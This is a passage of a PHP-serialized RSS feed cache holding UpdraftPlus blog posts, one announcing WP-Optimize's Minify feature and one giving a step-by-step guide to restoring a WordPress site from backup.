feature\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"http://feedproxy.google.com/~r/UpdraftPlus/~3/NeWIJ2fr3cQ/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"https://updraftplus.com/wp-optimize-updated-with-new-minify-feature/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 02 Jun 2020 12:35:36 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:7:{i:0;a:5:{s:4:\"data\";s:11:\"WP Optimize\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:6:\"Minify\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:4:\"WP-O\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:11:\"WP-Optimise\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:18:\"WP-Optimise Update\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:5;a:5:{s:4:\"data\";s:11:\"WP-Optimize\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:6;a:5:{s:4:\"data\";s:17:\"WP-Optmize update\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"https://updraftplus.com/?p=590046\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:761:\"<p>WP-Optimize is our popular all-in-one WordPress performance and optimisation plugin that cleans your database, compresses your large images and caches your site. As you may have seen in our recent blog, in addition to these features WP-Optimize have now released &#8230; <a href=\"https://updraftplus.com/wp-optimize-updated-with-new-minify-feature/\">Continue reading <span class=\"meta-nav\">&#8594;</span></a></p>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/wp-optimize-updated-with-new-minify-feature/\">WP-Optimize updated with new Minify feature</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Wayne Mullins\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:5847:\"<p><iframe title=\"Minify for WP-Optimize\" src=\"https://player.vimeo.com/video/402556749?dnt=1&amp;app_id=122963\" width=\"1080\" height=\"608\" frameborder=\"0\" allow=\"autoplay; fullscreen\" allowfullscreen></iframe></p>\n<p><span style=\"font-weight: 400;\"><br />\nWP-Optimize is our popular all-in-one WordPress performance and optimisation plugin that cleans your database, compresses your large images and caches your site. As you may have seen in our recent </span><a href=\"https://updraftplus.com/wp-optimize-to-release-new-minify-feature/\"><span style=\"font-weight: 400;\">blog</span></a><span style=\"font-weight: 400;\">, in addition to these features WP-Optimize have now released a new Minify feature that can help make your website run even faster. This new Minify feature is all about increasing the speed of users&#8217; WordPress site.</span></p>\n<p><b>How does Minify work?</b></p>\n<p><span style=\"font-weight: 400;\">Minify works by combining and minifying the static assets of your website, including CSS and JavaScript files. By removing the unnecessary characters in these static assets, Minify deletes characters such as line breaks and white space from your website’s code; the deletion of which can help your site to load faster by further saving space. Minify also ensures that your files are merged into as few files as possible. This reduces the amount of load on your web server and can be quicker to load fewer files.</span></p>\n<p><span style=\"font-weight: 400;\">Users can also defer the loading of any CSS or JavaScript file. This means any large or extraneous CSS or JavaScript file can be loaded independently from the core of your WordPress site; giving users quicker access to your site.</span></p>\n<p><span style=\"font-weight: 400;\">WP-Optimize Minify has been built and designed to work seamlessly with your website and the overall WP-Optimize optimization process. By activating and using Minify, you should find that everything on your site still acts and behaves in exactly the same way that it always has, with the one difference being that it will now hopefully run faster due to the removal of all the unnecessary information.  </span></p>\n<p><b>Is Minify easy to use?</b></p>\n<p><span style=\"font-weight: 400;\">We have designed the Minify feature to be easy to use regardless of a user&#8217;s level of skill and knowledge. For most people, all you have to do is toggle the main switch to “enable minify”. </span></p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2020/06/New-Project-44.jpg\"><img class=\"alignnone wp-image-590051 size-large\" src=\"https://updraftplus.com/wp-content/uploads/2020/06/New-Project-44-1024x420.jpg\" alt=\"\" width=\"1024\" height=\"420\" srcset=\"https://updraftplus.com/wp-content/uploads/2020/06/New-Project-44-980x402.jpg 980w, https://updraftplus.com/wp-content/uploads/2020/06/New-Project-44-480x197.jpg 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) 1024px, 100vw\" /></a></p>\n<p><span style=\"font-weight: 400;\">WP-Optimize will then automatically take care of all your minification needs. </span></p>\n<p><b>What if I have issues using Minify?</b></p>\n<p><span style=\"font-weight: 400;\">While simply just turning on Minify will get great results and be sufficient for most users, there will be a small number of users that may find that due to their specific website design, the appearance of the site may have altered. While the possibility of this happening will be rare, there is a very small chance it could happen. Should you find yourself in this position, just toggle the “enable minify&#8221; switch again to turn off the feature and your site will revert back to its original state. We then recommend visiting our support forum and ask for help on how to configure Minify to work on your site.</span></p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2020/06/New-Project-45.jpg\"><img class=\"alignnone wp-image-590053 size-large\" src=\"https://updraftplus.com/wp-content/uploads/2020/06/New-Project-45-1024x303.jpg\" alt=\"\" width=\"1024\" height=\"303\" srcset=\"https://updraftplus.com/wp-content/uploads/2020/06/New-Project-45-980x290.jpg 980w, https://updraftplus.com/wp-content/uploads/2020/06/New-Project-45-480x142.jpg 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) 1024px, 100vw\" /></a></p>\n<p><b>Individual control</b></p>\n<p><span style=\"font-weight: 400;\">With WP-Optimize Minify, you also have the option of adjusting the settings specifically for your website. To change the settings to best suit you and your site, you can go into the HTML, JavaScript, CSS, Fonts, Settings or Advanced tabs to change the settings, creating specific rules for your site.</span></p>\n<p><span style=\"font-weight: 400;\">Should you wish to undo any of the changes you made, we designed Minify so that any changes you may make will not be permanent and can be rolled back by just removing your changes. </span></p>\n<p><span style=\"font-weight: 400;\">Using the Minify feature is completely risk free and is another important and proven way to speed up your page loading times.</span></p>\n<p><span style=\"font-weight: 400;\">We designed the Minify feature to be simple to use and intuitive. Just install </span><a href=\"https://getwpo.com/\"><span style=\"font-weight: 400;\">WP-Optimize</span></a><span style=\"font-weight: 400;\"> and start using it today.</span></p>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/wp-optimize-updated-with-new-minify-feature/\">WP-Optimize updated with new Minify feature</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"https://updraftplus.com/wp-optimize-updated-with-new-minify-feature/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"8\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"https://updraftplus.com/wp-optimize-updated-with-new-minify-feature/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:88:\"\n		\n		\n					\n		\n		\n		\n				\n		\n		\n		\n		\n		\n		\n\n					\n										\n					\n					\n			\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:6:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"How to restore your WordPress site to a previous date\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"http://feedproxy.google.com/~r/UpdraftPlus/~3/46LtfRAV2Lc/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"https://updraftplus.com/how-to-restore-your-wordpress-site-to-a-previous-date/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 22 May 2020 14:10:46 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:6:{i:0;a:5:{s:4:\"data\";s:22:\"UpdraftPlus advantages\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:32:\"how to restore my wordpress site\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:22:\"How to use UpdraftPlus\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:26:\"restore site previous date\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:22:\"restore wordpress site\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:5;a:5:{s:4:\"data\";s:19:\"updraftplus restore\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"https://updraftplus.com/?p=582659\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:784:\"<p>There’s nothing more distressing for a site manager then having something go wrong with your WordPress site. Whether it’s unexpected file changes, malware, errors, plugin updates, or something else entirely, the fix sadly may not be simple. Due to all &#8230; <a href=\"https://updraftplus.com/how-to-restore-your-wordpress-site-to-a-previous-date/\">Continue reading <span class=\"meta-nav\">&#8594;</span></a></p>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/how-to-restore-your-wordpress-site-to-a-previous-date/\">How to restore your WordPress site to a previous date</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Gina Lucia\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:14649:\"<p><a href=\"https://updraftplus.com/wp-content/uploads/2020/05/restore-wordpress-updraft.jpg\"><img class=\"alignnone size-full wp-image-582667\" src=\"https://updraftplus.com/wp-content/uploads/2020/05/restore-wordpress-updraft.jpg\" alt=\"\" width=\"1580\" height=\"660\" srcset=\"https://updraftplus.com/wp-content/uploads/2020/05/restore-wordpress-updraft.jpg 1580w, https://updraftplus.com/wp-content/uploads/2020/05/restore-wordpress-updraft-1280x535.jpg 1280w, https://updraftplus.com/wp-content/uploads/2020/05/restore-wordpress-updraft-980x409.jpg 980w, https://updraftplus.com/wp-content/uploads/2020/05/restore-wordpress-updraft-480x201.jpg 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) and (max-width: 1280px) 1280px, (min-width: 1281px) 1580px, 100vw\" /></a></p>\n<p><span style=\"font-weight: 400;\">There’s nothing more distressing for a site manager then having something go wrong with your WordPress site. Whether it’s unexpected file changes, malware, errors, plugin updates, or something else entirely, the fix sadly may not be simple. Due to all the potential issues a WordPress site faces, it can be a valuable lifeline to easily and quickly restore your site to a healthier point in time by using UpdraftPlus. It’s for this reason you might need to restore your WordPress site to a previous date and reset your site back to a healthier point in time.</span></p>\n<p><span style=\"font-weight: 400;\">In this guide, we’ll be providing you with step-by-step instructions detailing how you can restore your WordPress site to a previous date using the UpdraftPlus WordPress backup plugin. As a bonus, we’ll outline why you might need to restore your WordPress site with a few examples you might find familiar. </span></p>\n<p><b>The plugin mentioned in this guide:</b></p>\n<ul>\n<li style=\"font-weight: 400;\"><a href=\"https://updraftplus.com/\"><span style=\"font-weight: 400;\">UpdraftPlus</span></a><span style=\"font-weight: 400;\"> – Schedule regular backups of your WordPress site and restore it from those backups in your WordPress control panel.</span></li>\n</ul>\n<p><span style=\"font-weight: 400;\">Want to head straight to the tutorial? <a href=\"https://updraftplus.com/faqs/restore-site-updraftplus/\">Click here</a>.</span></p>\n<h3><span style=\"font-weight: 400;\">Why you might need to restore your WordPress site</span></h3>\n<p><span style=\"font-weight: 400;\">Before we outline how you can restore your site, it’s worth looking into some of the reasons why you might need to do it. Restoring your WordPress site to a previous date isn’t something that should be done lightly, but there are a few very valid and common reasons why you might need to. Here are a few you might recognise:</span></p>\n<h3><span style=\"font-weight: 400;\">Your site has been hacked or compromised</span></h3>\n<p><span style=\"font-weight: 400;\">WordPress itself is a secure content management system on which you can build your website. However, without proper management, it can be prone to attacks by bots and/or hackers. </span></p>\n<p><span style=\"font-weight: 400;\">Any of the following could give these bots or hackers an easy way into your website to spread malware, change access, steal user data or change files:</span></p>\n<ul>\n<li style=\"font-weight: 400;\"><b>WordPress, plugins or themes have not been updated</b><span style=\"font-weight: 400;\"> &#8211; Most plugins need to be kept up to date to remain secure and free from the latest vulnerabilities. By not updating plugins, website owners can leave their site unintentionally vulnerable.</span></li>\n<li style=\"font-weight: 400;\"><b>Weak passwords and usernames are still being used</b><span style=\"font-weight: 400;\"> &#8211; a weak or common username or password combination is enough for bots to gain access to your site. Even keeping the </span><a href=\"https://hackertarget.com/attacking-wordpress/\"><span style=\"font-weight: 400;\">username ‘admin’ on your site</span></a><span style=\"font-weight: 400;\"> can leave you open to easy access.</span></li>\n</ul>\n<p><span style=\"font-weight: 400;\">Should you site become compromised in this way, then a backup and restore plugin like </span><a href=\"https://updraftplus.com/\"><span style=\"font-weight: 400;\">UpdraftPlus</span></a><span style=\"font-weight: 400;\"> can restore your sites content. With an </span><a href=\"https://updraftplus.com/shop/more-files/\"><span style=\"font-weight: 400;\">additional add-on</span></a><span style=\"font-weight: 400;\">, UpdraftPlus can also restore your WordPress core and non-standard files too.</span></p>\n<h3><span style=\"font-weight: 400;\">Major changes were made and files are overwritten</span></h3>\n<p><span style=\"font-weight: 400;\">In the management of your WordPress site, sometimes things can get out of hand and mistakes can be made. For example, you have a developer or member of your team working on making improvements to your site but they forget to save an older version of the file they’re working on, just in case they make a mistake. </span></p>\n<p><span style=\"font-weight: 400;\">By making the wrong kind of changes, your developer has created an error on a major file, with you site now inaccessible to visitors. By using a </span><a href=\"https://updraftplus.com/\"><span style=\"font-weight: 400;\">backup and restore plugin</span></a><span style=\"font-weight: 400;\"> though, you’re able to restore your WordPress site to a previous date, before the error was created and the file was changed.</span></p>\n<p><b>Pro tip:</b><span style=\"font-weight: 400;\"> When either making changes to your website yourself or having a developer help you, we always recommend creating a clone/staging environment for your site. This way any changes you make won’t affect your live site. You can do this easily with </span><a href=\"https://updraftplus.com/updraftclone/\"><span style=\"font-weight: 400;\">UpdraftClone</span></a><span style=\"font-weight: 400;\">.</span></p>\n<p><span style=\"font-weight: 400;\">As a bonus, UpdraftPlus can be set up to perform automatic backups when plugins, themes and WordPress core updates run. This means that keeping your site up to date and secure has never been easier.</span></p>\n<h2><span style=\"font-weight: 400;\">How to restore your WordPress site to a previous date</span></h2>\n<p><span style=\"font-weight: 400;\">If you recognise any of the above situations and need to restore your WordPress site to a previous date, then the following step-by-step instructions will help.</span></p>\n<p><b>Note: </b><span style=\"font-weight: 400;\">UpdraftPlus can only restore your site to a previous date if you already had UpdraftPlus installed and performing scheduled backups. If you do not have UpdraftPlus installed, it is recommend that you contact your hosting provider, who can hopefully help you.</span></p>\n<p><span style=\"font-weight: 400;\">To save your future-self time, money and a serious headache, </span><a href=\"https://updraftplus.com/\"><span style=\"font-weight: 400;\">get UpdraftPlus installed</span></a><span style=\"font-weight: 400;\"> (it’s free) on your site to give you peace of mind.</span></p>\n<p><b>UpdraftPlus not only restores your WordPress site to a previous date, but it also:</b></p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Performs backups of all your WordPress files, databases, plugins and themes.</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Implements scheduled backups every 4, 8 or 12 hours, daily, weekly, fortnightly or monthly (set by you).</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Restores backups directly from your WordPress control panel.</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Lets you store your backups remotely on Google Drive, Dropbox, OneDrive and more.</span></li>\n</ul>\n<h3><span style=\"font-weight: 400;\">Installing UpdraftPlus</span></h3>\n<p><span style=\"font-weight: 400;\">Installing UpdraftPlus takes just a minute or two and is as simple as adding any other plugin to your site. To install, follow these steps:</span></p>\n<p>1.In your WordPress dashboard go to <b>Plugins</b> &gt; <b>Add New</b>.</p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2020/05/Screenshot-2020-02-24-at-13.17.30.jpg\"><img class=\"alignnone size-full wp-image-582672\" src=\"https://updraftplus.com/wp-content/uploads/2020/05/Screenshot-2020-02-24-at-13.17.30.jpg\" alt=\"\" width=\"675\" height=\"150\" srcset=\"https://updraftplus.com/wp-content/uploads/2020/05/Screenshot-2020-02-24-at-13.17.30.jpg 675w, https://updraftplus.com/wp-content/uploads/2020/05/Screenshot-2020-02-24-at-13.17.30-480x107.jpg 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 675px, 100vw\" /></a></p>\n<p>2. Type <b>UpdraftPlus</b> into the search bar.</p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2020/05/Screenshot-2020-02-24-at-13.18.39.png\"><img class=\"alignnone size-full wp-image-582673\" src=\"https://updraftplus.com/wp-content/uploads/2020/05/Screenshot-2020-02-24-at-13.18.39.png\" alt=\"\" width=\"1017\" height=\"126\" srcset=\"https://updraftplus.com/wp-content/uploads/2020/05/Screenshot-2020-02-24-at-13.18.39.png 1017w, https://updraftplus.com/wp-content/uploads/2020/05/Screenshot-2020-02-24-at-13.18.39-980x121.png 980w, https://updraftplus.com/wp-content/uploads/2020/05/Screenshot-2020-02-24-at-13.18.39-480x59.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) 1017px, 100vw\" /></a></p>\n<p>3. Find the <b>UpdraftPlus WordPress Backup Plugin</b> and press <b>Install Now</b> and then <b>Activate</b>.</p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2020/05/Screenshot-2020-02-24-at-13.19.53.png\"><img class=\"alignnone size-full wp-image-582674\" src=\"https://updraftplus.com/wp-content/uploads/2020/05/Screenshot-2020-02-24-at-13.19.53.png\" alt=\"\" width=\"514\" height=\"350\" srcset=\"https://updraftplus.com/wp-content/uploads/2020/05/Screenshot-2020-02-24-at-13.19.53.png 514w, https://updraftplus.com/wp-content/uploads/2020/05/Screenshot-2020-02-24-at-13.19.53-480x327.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 514px, 100vw\" /></a></p>\n<h3><span style=\"font-weight: 400;\">How to use UpdraftPlus to restore your WordPress site</span></h3>\n<p><span style=\"font-weight: 400;\">In this example, we have UpdraftPlus installed, set up and running and have already backed up our site in Google Drive (our storage of choice). If you need a little more help, read this guide to understand </span><a href=\"https://updraftplus.com/how-to-backup-a-wordpress-site-step-by-step-guide/\"><span style=\"font-weight: 400;\">how to get UpdraftPlus up and running</span></a><span style=\"font-weight: 400;\"> and backing up your site.</span></p>\n<p><b>To restore your site, do the following:</b></p>\n<p>1. Go to <b>Settings</b> &gt; <b>UpdraftPlus Backups</b> in your WordPress menu. This will open your UpdraftPlus settings page.</p>\n<p>2. Scroll down the page until you reach the <b>Existing Backups</b> section.</p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2020/05/01-udp-dashboard-1.png\"><img class=\"alignnone size-full wp-image-582675\" src=\"https://updraftplus.com/wp-content/uploads/2020/05/01-udp-dashboard-1.png\" alt=\"\" width=\"1033\" height=\"846\" srcset=\"https://updraftplus.com/wp-content/uploads/2020/05/01-udp-dashboard-1.png 1033w, https://updraftplus.com/wp-content/uploads/2020/05/01-udp-dashboard-1-980x803.png 980w, https://updraftplus.com/wp-content/uploads/2020/05/01-udp-dashboard-1-480x393.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) 1033px, 100vw\" /></a></p>\n<p>3. Find the backup from the date you want to restore and press the blue <b>Restore</b> button.</p>\n<p>4. You will then be shown a popup which will ask you which elements of your database you want to restore. Select the ones that apply and press <b>Restore.</b></p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2020/05/restore2.png\"><img class=\"alignnone size-full wp-image-582679\" src=\"https://updraftplus.com/wp-content/uploads/2020/05/restore2.png\" alt=\"\" width=\"601\" height=\"488\" srcset=\"https://updraftplus.com/wp-content/uploads/2020/05/restore2.png 601w, https://updraftplus.com/wp-content/uploads/2020/05/restore2-480x390.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 601px, 100vw\" /></a></p>\n<p><span style=\"font-weight: 400;\">When your restore is complete, a message will pop up telling you the “Restore has been successful”.</span></p>\n<p><span style=\"font-weight: 400;\">That’s it!, Restoring your WordPress site with UpdraftPlus is easy and hassle-free. Plus, you can configure how often you would like your backups to take place. This is handy if you have a very active site that’s updated regularly, allowing you to create daily updates to help give you peace of mind.</span></p>\n<h2><span style=\"font-weight: 400;\">Summary: Restoring your WordPress site to a previous date </span></h2>\n<p><span style=\"font-weight: 400;\">In this guide, you’ve learned why having the ability to restore your WordPress site is important and how to get it done quickly and easily using UpdraftPlus.</span></p>\n<p><span style=\"font-weight: 400;\">The investment you make in backing up your website so you can restore it to a previous date should you ever need to, will not only save you time but money also. </span></p>\n<p><span style=\"font-weight: 400;\">Having the ability to restore your WordPress site will help you avoid costly developer fees and website downtime. </span><a href=\"https://updraftplus.com/\"><span style=\"font-weight: 400;\">UpdraftPlus</span></a><span style=\"font-weight: 400;\"> makes this process simple and easy to do.</span></p>\n<p><b>The plugin featured in this guide:</b></p>\n<p><a href=\"https://updraftplus.com/\"><span style=\"font-weight: 400;\">Get UpdraftPlus for free</span></a><span style=\"font-weight: 400;\"> – Schedule regular backups of your WordPress site and restore it from those backups in your WordPress control panel.</span></p>\n<p>&nbsp;</p>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/how-to-restore-your-wordpress-site-to-a-previous-date/\">How to restore your WordPress site to a previous date</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"https://updraftplus.com/how-to-restore-your-wordpress-site-to-a-previous-date/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"https://updraftplus.com/how-to-restore-your-wordpress-site-to-a-previous-date/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:78:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:98:\"How millions working from home has slowed the internet and how WP-Optimize is working hard to help\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"http://feedproxy.google.com/~r/UpdraftPlus/~3/_v19JdJPn08/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 07 May 2020 10:46:43 